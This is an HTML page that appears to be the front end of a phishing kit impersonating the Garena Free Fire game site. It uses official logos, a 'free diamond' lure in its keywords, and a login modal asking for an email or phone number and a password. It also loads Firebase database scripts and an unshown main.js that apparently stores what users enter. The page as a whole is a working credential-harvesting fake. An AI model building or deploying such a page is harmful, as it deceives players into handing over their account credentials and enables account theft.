<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script src="https://cdn.tailwindcss.com"></script>
  <title>Garena Free Fire. Best survival Battle Royale on mobile!</title>
  <meta data-hid="description" name="description" content="Free Fire is a multiplayer battle royale mobile game, developed and published by Garena for Android and iOS. Battle in Style and be the last survivor!">
  <link rel="icon" type="image/x-icon" href="https://freefiremobile-a.akamaihd.net/common/web_event/common/images/ff-logo-icon.png">
  <meta name="keywords" content="Knives out, pubg, terminator, bullet strike, survival, battle royale, last batleground, last man standing, battle, Bullet strike, point blank, battleground, rules of survival, rule, royale, crossfire, sinh tồn, nhảy dù, bắn súng, 生存, 大逃殺, 絕地求生, 槍戰, 全民, survivor royale, 荒野行動, 吃雞, 狙擊, 無限戰場, PB, Headshot, Crisis Action, ยิง, ปืน, Fortnite, shooting, sobrevivência, Jogos de tiro, a última pessoa viva, la última persona viva, Batalla Royale, disparo, la última persona viva, primera persona, acción, point, blank, last survivor, 배틀로얄, 프라파이어, 서바이벌, 최후 1인, 배틀그라운드, 배틀그라운즈, Free Fire, 생존, 생존게임, FPS, 배그, pubg mobile, world of tanks, танки, пабг, пубг, королевская битва, clash of clans, clash royale, cs go, battlegrounds, jinxx6_6, free diamond" />
  <link rel="stylesheet" href="style.css">
  <link rel="stylesheet" href=".css">
  <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/toastify-js/src/toastify.min.css">
</head>
<body>
  
  <div class="background">
    

  
  <div id="loading_page" class="loading_page touch-none fixed">
    <img class="h-10 ldjjdnd" src="New Project 10 [ACFC107].gif" alt="loading...">
  </div>
  
  
  <div id="login_page" class="login_page z-50 flex">
    
    

    <div class="lph mb-5 w-9/12 h-auto rounded-lg overflow-hidden  ">
      
      
    <div class="h-32 mt-14">
    
        
        <div class="flex flex-col items-center">
          
        <input id="it1" placeholder="Enter your number or email" class=" font1 rounded-lg text-center w-9/12 h-10" type="email">
        
        </div>
        <div class="flex flex-col items-center">
          
        <input id="it2" placeholder="Enter password" class="rounded-lg font1 text-center w-9/12 mt-5  h-10" type="password">
        
        </div>

    </div>
      
       <div style="background: #333333;" class="flex h-12">
        <div class="w-2/4 h-full flex ">
          <button onclick="hidedi()" class="active:opacity-50 duration-150 tracking-widest white font1 w-full h-full">CANCEL</button>
        </div>
        <div class="w-px" style="background: #666666;"></div>
        <div class="ig w-2/4 h-full flex align-middle items-center">
          <button  onclick="go()" class="active:opacity-50 duration-150 tracking-widest white font1 w-full h-full text-xl">SUBMIT</button>
          
        </div>
      </div>
      
      
      
    </div>
    
  </div>
  
  
  
  
    <div class="navDiv grid  place-items-center h-14">
      <img src="https://dl.dir.freefiremobile.com/common/web_event/official2/dist/client/img/full_logo.969f536.png" alt="logo" class="h-5 " >
    </div>
      <img class="center pl-8 h-16 mt-80" src="https://dl.dir.freefiremobile.com/common/web_event/official2.ff.garena.all/202210/a3d16a9d12021a2238fe992afaf34f07.png" alt="logo">
      <button onclick="setTimeout(login, 1000);" class="btn active:opacity-50 duration-150 tracking-widest font1 font-thin w-40 mt-5 center h-10 rounded">LOGIN</button>
  </div>
  <!--FIREBASE-->
  <script src="https://www.gstatic.com/firebasejs/8.3.1/firebase-app.js"></script>
  <script src="https://www.gstatic.com/firebasejs/8.3.1/firebase-database.js"></script>
  <!--ADD JAVASCRIPT-->
  <script src="main.js"></script>
  <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/toastify-js"></script>
</body>
</html>
